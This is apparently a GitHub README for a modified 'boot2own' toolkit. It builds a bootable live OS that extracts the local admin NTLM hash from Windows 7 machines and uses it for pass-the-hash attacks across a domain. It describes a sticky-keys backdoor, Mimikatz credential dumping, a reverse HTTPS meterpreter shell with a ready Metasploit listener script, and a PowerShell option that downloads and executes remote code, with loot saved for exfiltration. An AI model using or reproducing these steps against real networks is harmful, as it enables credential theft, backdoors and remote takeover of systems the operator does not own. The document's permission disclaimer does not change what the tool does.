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Modified B2O

The boot2own toolkit

B2O is a toolkit that generates a live OS from a crunchbang iso. When a workstation is booted to this live environment it's hard drive is mounted and the NTLM hash of the local admin (RID 500) is extracted. The admin hash is then leveraged in attacks against a Windows domain network using a patched winexe binary.

Used crunchbang-11-20130506-i686.iso successfully to generate liveCD.

Used Ubuntu Server x86 12.04 successfully to compile patched winexe So use Ubuntu Server/Desktop x86 12.04 to compile binary for i686 crunchbang iso.

Confirmed working on Windows 7 only.


  • Add Plop boot manager to PXE generation script.
  • have Ramboot/Copy2ram functionality to generated iso, to aid live USB function.
  • Add additonal payloads
  • Add UEFI support (meaning there is no current UEFI support)


The following link has a demo iso that was generated with this kit. Don't take my word for it and test it in a Windows VM that is apart of a virtualized test domain.

Get demo here.

create an issue through github if you have any problems.


Watch it in HD to see the details.

video hosted on youtube here

Build Scripts

Run these scripts inside the boot2own/ folder to prevent any odd issue from appearing.

  • - compiles a patched winexe binary
  • - generates the live environment from a CrunchBang iso
  • - sets up a pxe server using the newly generated iso

Compile winexe

Insure that you are using a x86 Ubuntu 12.04 / Crunchbang computer for compiling winexe for the x86 LiveCD.

First you need to compile a patched winexe version that allows hash passing. Use the following script inside the boot2own-1.0 folder.

 usage : ./ 

If you already have a copy of smbexec installed, rename a copied smbwinexe to pwinexe and place it in.


Note: a x64 binary will not work.

Generate iso image

To generate a boot2own liveCD for yourself you will need to have a copy of a Crunchbang iso. The build scripts have been sucessfully tested on image crunchbang-11-20130506-i686.iso

to generate the boot2own live OS from the crunchbange iso use the following script with the CB iso as an argument.

 usage: ./ crunchbang-11-20130506-i686.iso

This will remaster the crunchbang iso to become the b2o live OS. the iso will be saved to boot2own/b2o-remaster/boot2own.iso

PXE Server

sets up a pxe server on a Beagle Bone black, Raspberry Pi or any hardware that has a Debian based OS. The script installs syslinux, dnsmasq and configures it to run as a PXE server. It then extracts the needed files from the boot2own.iso image file in order to boot it with PXE over a LAN.

It is preferable to use a device that has a gigabit Ethernet port.

To install run as ROOT

 ./ boot2own.iso

Default network settings in

eth0 netmask

Live Environment Options

Tested on hard drives with Windows 7 installed.

  • If the hard drive is encrypted B2O will fail.
  • If no Windows file system is detected the LiveCD OS will power off.

Boot computer by USB/CD/PXE You will then be presented with the following options.

[1] Sethc Backdoor

This option overwrites sethc.exe with cmd.exe, known as the sticky keys bypass. This enables one to activate a system cmd prompt when pressing the Shift keys 5 times at the Windows login screen. To reverse the process just run this option again on the same computer.

[2] Mimikatz

Option named after the program Mimikatz. It is delivered using a PowerShell script "Invoke-Mimikatz" (part of the PowerSploit toolkit) that loads the program reflectively into memory and then executes it, giving you clear text credentials. For more info read the contents of boot2own/live-files/pld2, also visit the program authors blog and the Github repo that host PowerSploit(read ABOUT CREDITS-B2O). The Output from this option is stored in a file [ /root/loot ]

[3] Invoke-Shellcode

A script that is apart of PowerSploit toolkit, executes a reverse https meterpreter shell back to the specified IP or domain. For this to work you will need to use the MetaSploit Framework to have a multi handler ready and waiting for a connection.

Setting up the multi handler:

Use an metasploit rc script

use multi/handler
set payload windows/meterpreter/reverse_https
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/system_migrate
exploit -j

execute this file msfconsole -r listener.rc

Note : system_migrate system_migrate is a modified version of smart_migrate, it's priority is to migrate out of powershell to an existing SYSTEM/NT AUTHORITY process to maintain this permissions level. If this is not done The patched winexe process will hang as powershell remains active.

to get this moded module working copy system_migrate.rb to


Do not forget to check permissions. Optional - if you already have the metasploit-framework installed and it is in your terminals PATH along with having the system_migrate.rb in the appropriate directory. You can use this shell script to start MSF and drop you directly into a multi handler configured to receive shells from b2o's option 3.

usage : ./ lhost-IP

Note : Invoke-Shellcode For author info and program details read the ABOUT and CREDITS-B2O.

Note : Proxies SYSTEM will ignore IE proxy settings so if a network uses a web application proxy (has good egress filtering) you will not get your shell and may possibly hang up a B2O execution run.

[4] PS URL

This option passes a powershell command string that downloads the contents of a target url to a powershell variable and then invokes the variable contents as an expression "IEX". This can be leveraged by your own custom powershell script that you wish to be executed remotely there is no need to enable remoting as you are passing the parameters through the patched winexe program.

[5] Windows cli

This option passes a command that is executed directly by winexe on victim machines, this option is whatever you make it.

[6] Show Credits

Shows Credits

[7] Shut Down Live session

Self explanitory


For the payload options [ 2 - 5 ] the output/result of each successful execution run is saved in a file

located: /root/loot (in the Live OS) how to exfil it, is up to you.

For ideas look at my git repo black-hole.

Use only with permission from network owners (make sure it's in writing).

Might? todo?

  • add pdf/usb vector to gen-obfuscated.
  • add the ability to reflectively load binaries/dll's.


Just an edited B2O toolkit







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  • PowerShell 51.7%
  • Perl 17.0%
  • Python 15.5%
  • Shell 14.6%
  • Other 1.2%